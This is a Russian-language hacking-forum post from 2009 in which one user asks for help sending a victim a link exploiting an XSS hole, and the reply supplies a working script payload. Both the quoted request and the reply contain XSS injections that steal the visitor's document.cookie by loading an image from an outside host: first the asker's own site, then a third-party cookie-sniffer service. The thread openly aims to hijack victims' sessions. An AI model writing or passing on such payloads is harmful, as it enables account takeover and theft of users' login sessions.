Показать сообщение отдельно

  #5  
Старый 21.11.2009, 11:16
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

Цитата:
Сообщение от xofffff  
Я знаю вы поможете мне вы умные все )

Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве

вот примерно такая
Код:
?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <
На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif

Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif.

Помогите реализовать мои коварные планы

Я думаю тебе надо регатся на тут,нажимаеш завести ID регаешся и
изменят на твоем запросе эту часть так:
Цитата:
<script>img=new Image(); img.src="http://web-defence.ru/snif/s.gif?id=ТВОЙ ИД НОМЕР&"+document.cookie;</script>
потом куки найдеш тута наберив твой ид и пасс
 
Ответить с цитированием